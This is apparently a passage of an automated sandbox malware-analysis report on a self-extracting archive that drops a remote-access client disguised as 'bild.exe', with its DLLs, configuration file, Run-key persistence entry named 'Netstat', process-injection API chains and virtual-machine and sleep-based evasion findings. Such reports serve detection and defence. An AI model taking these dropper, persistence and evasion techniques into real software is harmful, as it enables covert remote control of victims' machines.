                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                Source: C:\Users\user\Desktop\file.exe | File written: C:\Users\Public\Public\Videos\Video\client32.ini
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window Recorder | Window detected: More than 3 window changes detected
                                Source: file.exe | Static file information: File size 2138286 > 1048576
                                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\Public\Videos\Video\msvcr100.dll
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.4161525589.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1828324203.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1906366443.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.4161859396.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1828623878.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1906634135.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.4161743565.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1828561187.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1906535129.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\__tmp_rar_sfx_access_check_7074718
                                Source: PCICL32.DLL.0.dr | Static PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016D8B6 push ecx; ret 0_2_0016D8C9
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016CDF0 push eax; ret 0_2_0016CE0E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1116F055 push ecx; ret 4_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11169F49 push ecx; ret 4_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
                                Source: msvcr100.dll.0.dr | Static PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\bild.exe
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\PCICL32.DLL
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\remcmdstub.exe
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\pcicapi.dll
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\msvcr100.dll
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
                                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
                                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11112670 IsIconic,GetTickCount,4_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C0BB0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_11143570
                                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110B8200 Sleep,ExitProcess,4_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWindow / User API: threadDelayed 427Jump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWindow / User API: threadDelayed 8039Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-57324
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-61256
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-61292
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-61388
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-61152
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 6.1 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7580Thread sleep time: -55750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7584Thread sleep time: -42700s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7580Thread sleep time: -2009750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0015A273
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016C8D5 VirtualQuery,GetSystemInfo
Source: HTCTL32.DLL.0.dr | Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1708033734.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1708033734.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E$
Source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.clazl*
Source: HTCTL32.DLL.0.dr | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: bild.exe, 00000004.00000002.4158412935.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160269643.0000000004F8D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
